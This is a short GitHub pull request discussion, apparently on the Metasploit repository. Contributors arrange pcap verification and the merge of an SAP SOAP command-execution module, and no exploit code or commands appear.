nmonkee commented Nov 19, 2012

No worries, I'm fighting with vmnet-sniffer on OS X. PITA it is.


Contributor

nmonkee commented Nov 19, 2012

how do I get the pcap's to you?

Contributor

jvazquez-r7 commented Nov 19, 2012

nmonkee: you can email me or just send them via git is right heh :) awesome! will be checking asap! really thanks!

Contributor

jvazquez-r7 commented Nov 19, 2012

Awesome, nmonkee pcap's look good, merging!

nmonkee: there are two more modules related to command execution, which I think are going to have the same issue. Do you agree to use the same approach as this pull request? (I do the cleanup, do a pull request to your repo, you test, if it works you can land the pull request, send pcaps and I do the final merge)

@jvazquez-r7 jvazquez-r7 merged commit dcb5cfd into rapid7:master Nov 19, 2012

1 check passed

default The Travis build passed
Contributor

nmonkee commented Nov 19, 2012

No problem.


Coverage Status

Changes Unknown when pulling dcb5cfd on nmonkee:sap_soap_rfc_sxpg_command_exec into * on rapid7:master*.
